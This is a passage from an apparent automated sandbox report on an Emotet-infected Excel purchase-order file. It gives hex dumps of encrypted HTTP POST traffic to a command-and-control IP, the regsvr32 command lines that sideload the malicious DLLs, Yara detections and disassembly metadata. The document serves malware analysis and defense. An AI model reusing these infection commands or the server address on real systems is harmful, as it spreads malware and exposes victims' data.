02 80 01 00 00 00 0b 00 00 00 00 00 00 00 e0 47 02 80 01 00 00 00 15 00 00 00 00 00 00 00 d8 47 02 80 01 00 00 00 1c 00 00 00 00 00 00 00 d0 47 02 80 01 00 00 Data Ascii: 4H,H$H!HHHHGG'' GGGGG
2022-11-13 18:26:59 UTC	417	IN	Data Raw: 09 ea 01 00 f8 55 06 00 0c ea 01 00 4f ea 01 00 10 56 06 00 50 ea 01 00 82 ea 01 00 18 56 06 00 84 ea 01 00 e2 ea 01 00 20 56 06 00 e4 ea 01 00 d4 eb 01 00 2c 56 06 00 d4 eb 01 00 63 ec 01 00 4c 56 06 00 64 ec 01 00 ee ec 01 00 64 56 06 00 f8 ec 01 00 1f ed 01 00 78 56 06 00 2c ed 01 00 67 ed 01 00 80 56 06 00 68 ed 01 00 91 ed 01 00 8c 56 06 00 94 ed 01 00 be ed 01 00 94 56 06 00 d0 ed 01 00 09 ee 01 00 9c 56 06 00 0c ee 01 00 2f ef 01 00 a8 56 06 00 30 ef 01 00 81 ef 01 00 c0 56 06 00 84 ef 01 00 0d f1 01 00 d8 56 06 00 24 f1 01 00 be f1 01 00 14 57 06 00 c0 f1 01 00 02 f2 01 00 24 57 06 00 28 f2 01 00 41 f2 01 00 44 57 06 00 44 f2 01 00 13 f3 01 00 4c 57 06 00 14 f3 01 00 69 f3 01 00 58 57 06 00 6c f3 01 00 c3 f4 01 00 60 57 06 00 cc f4 01 00 df f4 01 Data Ascii: UOVPV V,VcLVddVxV,gVhVVV/V0VV$W$W(ADWDLWiXWl`W

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49712	182.162.143.56	443	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-13 18:28:08 UTC	424	OUT	POST /tkafmhcgcid/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Content-Length: 284 Host: 182.162.143.56
2022-11-13 18:28:08 UTC	424	OUT	Data Raw: 63 62 6d 6c 66 6a 62 68 69 71 6e 66 67 6c 3d 58 45 78 37 44 30 6c 34 38 54 46 62 49 50 47 6a 41 72 32 6e 77 46 43 54 75 69 52 33 42 30 44 6e 67 73 62 35 69 5a 48 59 72 7a 6e 2f 7a 39 78 66 49 64 54 47 74 66 44 63 4e 42 70 61 63 33 6a 71 4d 4f 76 61 45 5a 4b 72 59 74 67 35 30 63 6f 72 75 41 30 38 42 43 32 55 59 44 74 64 62 43 38 47 6d 38 69 39 53 6e 49 58 70 2f 64 77 57 33 32 73 49 4d 31 4b 56 6a 7a 4c 70 4a 6d 71 42 6b 6b 4b 38 59 2b 38 55 67 54 65 4f 55 64 70 38 47 46 46 68 37 34 4e 32 49 76 5a 70 7a 48 79 73 2f 53 4c 51 4a 30 2b 47 74 4e 50 6d 33 54 77 6c 58 45 41 37 4c 43 75 39 58 5a 52 31 58 48 4e 74 43 65 39 4a 73 4d 41 76 63 70 41 38 47 30 59 33 6c 54 26 61 7a 67 65 64 6c 70 3d 6a 47 34 55 58 63 6a 44 75 5a 66 53 76 77 76 64 72 61 56 6f 77 33 58 50 Data Ascii: cbmlfjbhiqnfgl=XEx7D0l48TFbIPGjAr2nwFCTuiR3B0Dngsb5iZHYrzn/z9xfIdTGtfDcNBpac3jqMOvaEZKrYtg50coruA08BC2UYDtdbC8Gm8i9SnIXp/dwW32sIM1KVjzLpJmqBkkK8Y+8UgTeOUdp8GFFh74N2IvZpzHys/SLQJ0+GtNPm3TwlXEA7LCu9XZR1XHNtCe9JsMAvcpA8G0Y3lT&azgedlp=jG4UXcjDuZfSvwvdraVow3XP
2022-11-13 18:28:10 UTC	424	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 13 Nov 2022 18:28:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-11-13 18:28:10 UTC	424	IN	Data Raw: 34 35 37 0d 0a 25 73 8f 1a 82 d1 90 c1 3a c1 bf 7e df d6 7b 00 ba d2 6f 48 8e af a4 a2 d3 65 dd 65 47 5f 48 07 0b 48 81 09 83 c0 ec a4 2d 70 17 6b aa 54 46 f4 7f 74 c1 7c 03 29 5b c3 a3 a3 cd 6a 6b 82 f2 cb 1b fa df 35 ce 5a e1 0d 29 c2 43 dc 36 21 6f 7e 29 17 ef c7 e5 42 90 7f eb 4f fa 34 fa c5 67 d7 15 6b fb 02 a9 c1 85 70 ea 64 00 2c 86 0e 37 3e 2a 4f 5d 0d 66 72 38 14 c6 84 19 ba 1b 0c e0 78 23 5c 31 7a 87 90 23 d5 0f ae 64 8b be e0 14 1f d2 15 43 08 a9 b0 86 43 98 c4 11 21 29 93 d2 58 6b 25 87 70 8f 42 e8 ab 8f a7 1b e4 08 70 e8 40 aa 88 68 18 ba 7a 82 b3 c4 36 f0 04 6c f9 b8 34 4c 20 c6 6a af a6 d7 3b 82 8a ea 93 f4 46 99 6d a2 37 99 51 78 ec 1d c0 0c ff 87 d0 71 df 8b 94 81 3e df 7e 18 f8 29 7c ef 42 5d fa f7 e8 8d e5 96 11 c7 e4 b0 3e 52 e5 c1 8d Data Ascii: 457%s:~{oHeeG_HH-pkTFt\|)[jk5Z)C6!o~)BO4gkpd,7>*O]fr8x#\1z#dCC!)Xk%pBp@hz6l4L j;Fm7Qxq>~)\|B]>R

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49713	182.162.143.56	443	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-13 18:28:14 UTC	425	OUT	POST /qqvehgyxm/bitss/ktcpnaio/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Content-Length: 304 Host: 182.162.143.56
2022-11-13 18:28:14 UTC	425	OUT	Data Raw: 69 6c 6d 76 6c 62 72 76 61 61 3d 34 67 45 51 46 45 51 46 59 42 52 4e 4e 48 51 31 73 68 34 6b 58 44 69 75 61 36 53 4e 33 79 79 46 75 35 76 53 65 4b 4d 59 53 35 6b 36 4c 67 49 76 71 68 66 71 45 54 7a 31 65 67 59 37 35 61 67 72 38 57 57 50 71 2b 2b 75 62 32 65 7a 78 59 61 56 61 4d 55 42 71 61 46 4c 59 31 30 75 69 4c 4e 55 6d 65 78 4b 69 37 30 79 6f 6f 72 6e 6f 6b 6e 6b 7a 78 66 46 6d 73 70 6f 72 72 65 61 79 70 57 6f 71 37 30 6a 6a 4c 30 61 52 6e 6b 70 48 32 4c 45 42 43 79 4c 30 55 76 6b 32 32 77 51 50 36 77 58 6e 51 45 77 64 4b 41 79 47 32 70 68 74 4c 75 61 4c 73 7a 35 39 57 34 66 76 5a 50 4a 4f 7a 72 47 47 75 74 78 4e 67 43 55 75 2f 4f 32 47 68 26 6d 70 6e 6f 70 6b 79 7a 7a 64 6a 6b 61 3d 66 69 37 5a 51 79 4e 4a 38 72 66 74 6e 70 66 2b 56 34 66 58 49 69 74 Data Ascii: ilmvlbrvaa=4gEQFEQFYBRNNHQ1sh4kXDiua6SN3yyFu5vSeKMYS5k6LgIvqhfqETz1egY75agr8WWPq++ub2ezxYaVaMUBqaFLY10uiLNUmexKi70yoornoknkzxfFmsporreaypWoq70jjL0aRnkpH2LEBCyL0Uvk22wQP6wXnQEwdKAyG2phtLuaLsz59W4fvZPJOzrGGutxNgCUu/O2Gh&mpnopkyzzdjka=fi7ZQyNJ8rftnpf+V4fXIit
2022-11-13 18:28:15 UTC	426	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 13 Nov 2022 18:28:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-11-13 18:28:15 UTC	426	IN	Data Raw: 34 32 62 0d 0a 3a 90 10 13 10 3a b1 3b ee 6c 47 5a 51 21 38 67 ab f3 24 21 71 fb 7f 98 1a b4 08 57 b8 e6 89 2a 27 28 bc 37 da 6c e5 80 ed 30 18 32 7b 08 0e 78 67 c4 6e f3 91 9a b4 f7 f0 d3 00 a1 17 7a e3 ba be ae 60 0b 8c fc d2 8f 90 41 49 f8 a3 4f 36 1e f8 55 02 48 56 5d a2 08 b2 17 62 44 ba 6b 20 10 6f 3c c2 3c 00 ca 88 b9 56 a7 95 4d 87 d6 09 5e 5d 11 e9 a6 a8 71 8d 9e 78 de 9b be 57 04 79 80 02 ec 3b 7a d7 16 09 e7 9d 1b 60 d1 6f 04 99 f4 2d 3b c4 77 ce 69 65 f5 ef 4b 4d 62 32 d0 e2 b0 4c d7 d4 0d 73 0f bd 3f 1f be eb aa 9b 18 46 4d d3 d4 56 46 48 9f 52 bf eb d9 9c e0 82 45 c2 fa cf b6 7e a7 ae ed 55 a0 d6 46 c1 0b 3d 7f 7a a5 5c 8b 3f f1 cf e6 57 1f 48 0d 33 81 35 5c 3a 14 35 2b 7e ef d3 1b a8 6b f5 03 41 82 3a ae 60 33 25 64 f0 92 79 54 c8 3a 30 e3 Data Ascii: 42b::;lGZQ!8g$!qW*'(7l02{xgnz`AIO6UHV]bDk o<<VM^]qxWy;z`o-;wieKMb2Ls?FMVFHRE~UF=z\?WH35\:5+~kA:`3%dyT:0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXEPID: 4380, Parent PID: 3800

General

Target ID:	0
Start time:	19:26:43
Start date:	13/11/2022
Path:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO0000001552.xls
Imagebase:	0x7ff62cde0000
File size:	64367408 bytes
MD5 hash:	23CAD504B3E04BB54CD636AD2874041A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 6588, Parent PID: 4380

General

Target ID:	7
Start time:	19:26:50
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
Imagebase:	0x7ff7208c0000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 6608, Parent PID: 4380

General

Target ID:	8
Start time:	19:26:54
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
Imagebase:	0x7ff7208c0000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 6676, Parent PID: 6608

General

Target ID:	10
Start time:	19:26:57
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"
Imagebase:	0x7ff7208c0000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 6756, Parent PID: 4380

General

Target ID:	11
Start time:	19:27:00
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
Imagebase:	0x7ff7208c0000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 6792, Parent PID: 6756

General

Target ID:	12
Start time:	19:27:03
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll"
Imagebase:	0x7ff7208c0000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: regsvr32.exePID: 6608, Parent PID: 4380COMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	2.3%
Signature Coverage:	8.8%
Total number of Nodes:	924
Total number of Limit Nodes:	6

Executed Functions

Function 009B0000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 009B0344
VirtualAlloc.KERNELBASE ref: 009B038A
VirtualProtect.KERNELBASE ref: 009B085C
RtlAddFunctionTable.KERNEL32 ref: 009B08E9

Strings

Libr, xrefs: 009B009D
ativ, xrefs: 009B010F
temI, xrefs: 009B011F
Virt, xrefs: 009B00C5
o, xrefs: 009B012E
Cach, xrefs: 009B0100
truc, xrefs: 009B00F2
aryA, xrefs: 009B00A5
ncti, xrefs: 009B0141
rote, xrefs: 009B00D5
Slee, xrefs: 009B0084
ualP, xrefs: 009B00CD
eSys, xrefs: 009B0117
onTa, xrefs: 009B0148
ct, xrefs: 009B00DD
ualA, xrefs: 009B00B5
RtlA, xrefs: 009B0133
tion, xrefs: 009B00F9
Load, xrefs: 009B0095
lloc, xrefs: 009B00BD
nf, xrefs: 009B0127
GetN, xrefs: 009B0107
Virt, xrefs: 009B00AD
Flus, xrefs: 009B00E4
ddFu, xrefs: 009B013A
hIns, xrefs: 009B00EB

Memory Dump Source

Source File: 00000008.00000002.1290140848.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b0000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 998211078-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: d8102a9836393acfae69a4b91935e7474e5acd96fee8c6ae057a3f2dbaf93086
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 60520330618B488BC729DF18D9857FAB7E1FB94314F14462DE88BC7251EB34E946CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001864 Relevance: 7.9, Strings: 6, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

o_, xrefs: 00000001800019A2
0, xrefs: 0000000180001980
S, xrefs: 0000000180001B33
rh, xrefs: 0000000180001DA4
Q~, xrefs: 00000001800019F7, 00000001800019EB, 0000000180001C5B, 0000000180001DDE, 0000000180001D09, 0000000180001D54, 0000000180001C39, 0000000180001E74, 0000000180001D96, 0000000180001C22, 0000000180001B7C, 0000000180001C49, 0000000180001A0C, 0000000180001D18, 0000000180001B6A, 0000000180001A2B, 0000000180001AEB, 00000001800018F7, 0000000180001CA5, 0000000180001A50
Q~, xrefs: 0000000180001905

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Q~$Q~$0$S$o_$rh
API String ID: 0-2138576042
Opcode ID: 5e1b0978f8f9846f43e2bea0e03f405b69613694843aa09990415df6c376f501
Instruction ID: 188c1361a23e6ad5d6055c6decd0cb402179bcc8801bac07be60f8210c67be5b
Opcode Fuzzy Hash: 5e1b0978f8f9846f43e2bea0e03f405b69613694843aa09990415df6c376f501
Instruction Fuzzy Hash: 5D22E570510788DFDB98DF28C889ADD3FA1FB483A8F956219FC0A97290D774D985CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019F38 Relevance: 6.5, Strings: 5, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 000000018001A227
<q+, xrefs: 000000018001A1A4
f], xrefs: 000000018001A219
P, xrefs: 000000018001A1DE
LLCf, xrefs: 000000018001A1BC

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <q+$LLCf$\$f]$P
API String ID: 0-3672281703
Opcode ID: 05ccb559511b71173230ca7e7be1dce73a909a9d07f4dc889358141c448b61c4
Instruction ID: 265aeea36392b044b8397e8defa31dfa6669a7a85a24a4f633674630fd2f5fc7
Opcode Fuzzy Hash: 05ccb559511b71173230ca7e7be1dce73a909a9d07f4dc889358141c448b61c4
Instruction Fuzzy Hash: 7A91387051074D8BEB88DF28C88A6DE3FA1FB18388F55822DFC4A96290C778D594CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180012108 Relevance: 6.4, Strings: 5, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

g(, xrefs: 0000000180012216
:P, xrefs: 0000000180012254
TTMl, xrefs: 0000000180012206
g(, xrefs: 00000001800122A2
Fm, xrefs: 000000018001219A

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: :P$Fm$TTMl$g($g(
API String ID: 0-1760300932
Opcode ID: 35dc3a46165115c5b824d07f550f560c064e34de772aff6205be7b74c0bda806
Instruction ID: 1efb9e605c89b73597f32a758b8ca89b33c921972f7d2c9c749e1d2df1591218
Opcode Fuzzy Hash: 35dc3a46165115c5b824d07f550f560c064e34de772aff6205be7b74c0bda806
Instruction Fuzzy Hash: 9B71F3B0D1070C8FDB48CFA8D48A5DDBBB1FB4C358F259219E81AB6290D7749945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180027AE4 Relevance: 5.1, Strings: 4, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

J], xrefs: 0000000180027D1A
*q, xrefs: 0000000180027D0A
IZ, xrefs: 0000000180027C7B
r, xrefs: 0000000180027C63

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *q$IZ$J]$r
API String ID: 0-2497554898
Opcode ID: 43c7a842463a437fe1eded88d271485cd70f234d753bf00be1fd1f2e6629932a
Instruction ID: a8845266b5974d967b5ababb0eb11ed0c979ed5efda08082c324e04f2968d530
Opcode Fuzzy Hash: 43c7a842463a437fe1eded88d271485cd70f234d753bf00be1fd1f2e6629932a
Instruction Fuzzy Hash: 5361ACB051C7808BE769DF28C48954BBBF1FB86758F004A1DF685862A0D7BAD909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0675D0 Relevance: 4.5, APIs: 3, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE ref: 00007FFD2B0675E6
GetVersion.KERNEL32 ref: 00007FFD2B0675F8
HeapSetInformation.KERNEL32 ref: 00007FFD2B067616

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Heap$CreateInformationVersion
String ID:
API String ID: 3563531100-0
Opcode ID: ff5e6d536eaa35a4d46f5682f650b60aebbb2f539376b8b6ec45a6a19b727594
Instruction ID: ef42fc012cc6ec33d4bf8f813882a27519c7c61df2a2c46ef6b3f390e776cfab
Opcode Fuzzy Hash: ff5e6d536eaa35a4d46f5682f650b60aebbb2f539376b8b6ec45a6a19b727594
Instruction Fuzzy Hash: BDE09B78F1BA4246FB875B14AD657752260BF69700F900434FA8E027F4DFBCE5459750

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000EB3C Relevance: 4.5, Strings: 3, Instructions: 740
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9, xrefs: 000000018000F7E5
jD]d, xrefs: 000000018000EBED
7%, xrefs: 000000018000F78B

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 7%$9$jD]d
API String ID: 0-1546762489
Opcode ID: 3a2c75b155999ceca95a1101aa2672927a553c18006282dbc89149371d9a150e
Instruction ID: 169ab63c6de9708b2d6ff7ebaceebcae706aa59c3a2d7becb4d2446022c3bb94
Opcode Fuzzy Hash: 3a2c75b155999ceca95a1101aa2672927a553c18006282dbc89149371d9a150e
Instruction Fuzzy Hash: AC82EA7151074D8BDF88CF24C88A6DE3FA1FB68398F615218FC4AA62A0C778D595CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007F20 Relevance: 4.0, Strings: 3, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-F, xrefs: 00000001800081E6
b/, xrefs: 0000000180008054
+:, xrefs: 0000000180008265

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +:$-F$b/
API String ID: 0-2853193221
Opcode ID: 320a9a5064c2bc21a0540459f418b250373266716c94cc0e27337242bf2797b8
Instruction ID: 737d24e7272c4c3b9b72648f791c5085104e51d52394de1257a227f0ab4226e1
Opcode Fuzzy Hash: 320a9a5064c2bc21a0540459f418b250373266716c94cc0e27337242bf2797b8
Instruction Fuzzy Hash: 58B1AD7112A784AFD399DF24C58A95BBBF0FB84748F80691DF8D6862A0D7B4D904CB43

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000FBB4 Relevance: 3.8, Strings: 3, Instructions: 76COMMON

Download Yara Rule

Strings

P1, xrefs: 000000018000FBC9
=, xrefs: 000000018000FCC7
iD, xrefs: 000000018000FBD1

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: P1$iD$=
API String ID: 0-3914590764
Opcode ID: 54ed1ebd14070d7b33ab5e4994ec722d1d326e05f26750878d1ae811eccdbc9a
Instruction ID: cd48c7c98638ea9050d9ec6f13eccaefb93dc6b992923aa58e6fe742ccc161f4
Opcode Fuzzy Hash: 54ed1ebd14070d7b33ab5e4994ec722d1d326e05f26750878d1ae811eccdbc9a
Instruction Fuzzy Hash: 9E31EEB15587888FD348DF69C48A50AFFE2FBD4784F504A1DF482863A4D7B4D545CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008470 Relevance: 2.8, Strings: 2, Instructions: 311COMMON

Download Yara Rule

Strings

{, xrefs: 000000018000848B
\, xrefs: 000000018000895F

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: \${
API String ID: 0-678260969
Opcode ID: 373689a8370a2b976fd3f6cbd9c4ab5b964727591edad26c43d96574c5dc916b
Instruction ID: b27e16a6b33d669af57ca606ea4693b712f978dac00823e541d9e40ea4f99018
Opcode Fuzzy Hash: 373689a8370a2b976fd3f6cbd9c4ab5b964727591edad26c43d96574c5dc916b
Instruction Fuzzy Hash: 3B02E6715087C88BEBBECF64C8897DE3BA9FB44708F10521DEA4A9E298DB745745CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800274F4 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

%N, xrefs: 00000001800277C7

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %N
API String ID: 0-944680591
Opcode ID: fe83645fe756a776de9565e5026d5fc39fe0b4df6c8eb006d5d39841c4a4c783
Instruction ID: 3c452895d693fb340123c723d27f44680dcccb39e5392457550dc33261e3d05d
Opcode Fuzzy Hash: fe83645fe756a776de9565e5026d5fc39fe0b4df6c8eb006d5d39841c4a4c783
Instruction Fuzzy Hash: 99A100702197489FE7AACF14C5857DABBE1FB99344F805A1DF88A8B291C774DA04CB43

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B061BDC Relevance: 128.5, APIs: 9, Strings: 64, Instructions: 793
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32 ref: 00007FFD2B0635E6

Part of subcall function 00007FFD2B061B14: CoLoadLibrary.OLE32 ref: 00007FFD2B061B41

LoadStringW.USER32 ref: 00007FFD2B06360B
LoadStringW.USER32 ref: 00007FFD2B063625

Part of subcall function 00007FFD2B063874: LoadCursorW.USER32 ref: 00007FFD2B0638AE
Part of subcall function 00007FFD2B063874: RegisterClassExW.USER32 ref: 00007FFD2B0638D9

Part of subcall function 00007FFD2B0638E8: CreateWindowExW.USER32 ref: 00007FFD2B06393C

CoUninitialize.OLE32 ref: 00007FFD2B063644
TranslateAcceleratorW.USER32 ref: 00007FFD2B063658
TranslateMessage.USER32 ref: 00007FFD2B063667
DispatchMessageW.USER32 ref: 00007FFD2B063672
GetMessageW.USER32 ref: 00007FFD2B063685
CoUninitialize.OLE32 ref: 00007FFD2B06368F

Strings

x%8, xrefs: 00007FFD2B061CCC
E(jX, xrefs: 00007FFD2B061F23
_$9, xrefs: 00007FFD2B061F2D
4IRH, xrefs: 00007FFD2B061FC3
%hy, xrefs: 00007FFD2B061D19
sN , xrefs: 00007FFD2B062621
`RZD, xrefs: 00007FFD2B062031
x!t, xrefs: 00007FFD2B0630F3
<IE, xrefs: 00007FFD2B06208B
4j@, xrefs: 00007FFD2B062437
xmbE, xrefs: 00007FFD2B0620EF
8g$, xrefs: 00007FFD2B06242D
md"o, xrefs: 00007FFD2B062D83
]yO, xrefs: 00007FFD2B062C07
bxKq, xrefs: 00007FFD2B06244B
_{c=, xrefs: 00007FFD2B0620BD
m)H, xrefs: 00007FFD2B062473
]oo, xrefs: 00007FFD2B062509
%4^*, xrefs: 00007FFD2B061D27
0kiK, xrefs: 00007FFD2B062F09
